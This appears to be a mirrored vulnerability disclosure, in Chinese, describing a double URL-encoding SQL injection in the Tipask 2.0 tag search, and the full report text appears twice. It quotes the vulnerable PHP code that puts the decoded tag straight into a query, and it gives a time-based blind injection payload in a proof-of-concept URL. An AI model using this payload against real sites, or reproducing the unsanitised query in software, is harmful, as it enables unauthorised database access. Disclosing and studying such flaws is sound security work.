VULHUB ™

### 简要描述： 其实我是来膜拜猪头子的 ### 详细说明： 关于对get/post检测的部分，主要就是看猪头子大牛的： [WooYun: tipask问答系统2.0 ajaxsearch二次编码注入漏洞](http://www.wooyun.org/bugs/wooyun-2013-025802) /model/question.php ``` function ontag() { $tag = urldecode($this->get['2']); //二次编码绕过 //echo $tag; $encodeword = urlencode($tag); $navtitle = $tag . '-标签搜索'; $qstatus = $status = intval($this->get[3]); (!$status) && ($qstatus = "1,2,6"); $startindex = ($page - 1) * $pagesize; $rownum = $this->db->fetch_total("question_tag", " tname='$tag' "); //带入查询 ``` /lib/db.class.php function fetch_total($table,$where='1') { return $this->result_first("SELECT COUNT(*) num FROM ".DB_TABLEPRE."$table WHERE $where"); //带入查询 } ### 漏洞证明： ``` exp：http://host/tipask/?question/tag/+urlencode("' and (select if(1=1,benchmark(500000,sha(1)),0))>0#"); ```

### 简要描述： 其实我是来膜拜猪头子的 ### 详细说明： 关于对get/post检测的部分，主要就是看猪头子大牛的： [WooYun: tipask问答系统2.0 ajaxsearch二次编码注入漏洞](http://www.wooyun.org/bugs/wooyun-2013-025802) /model/question.php ``` function ontag() { $tag = urldecode($this->get['2']); //二次编码绕过 //echo $tag; $encodeword = urlencode($tag); $navtitle = $tag . '-标签搜索'; $qstatus = $status = intval($this->get[3]); (!$status) && ($qstatus = "1,2,6"); $startindex = ($page - 1) * $pagesize; $rownum = $this->db->fetch_total("question_tag", " tname='$tag' "); //带入查询 ``` /lib/db.class.php function fetch_total($table,$where='1') { return $this->result_first("SELECT COUNT(*) num FROM ".DB_TABLEPRE."$table WHERE $where"); //带入查询 } ### 漏洞证明： ``` exp：http://host/tipask/?question/tag/+urlencode("' and (select if(1=1,benchmark(500000,sha(1)),0))>0#"); ```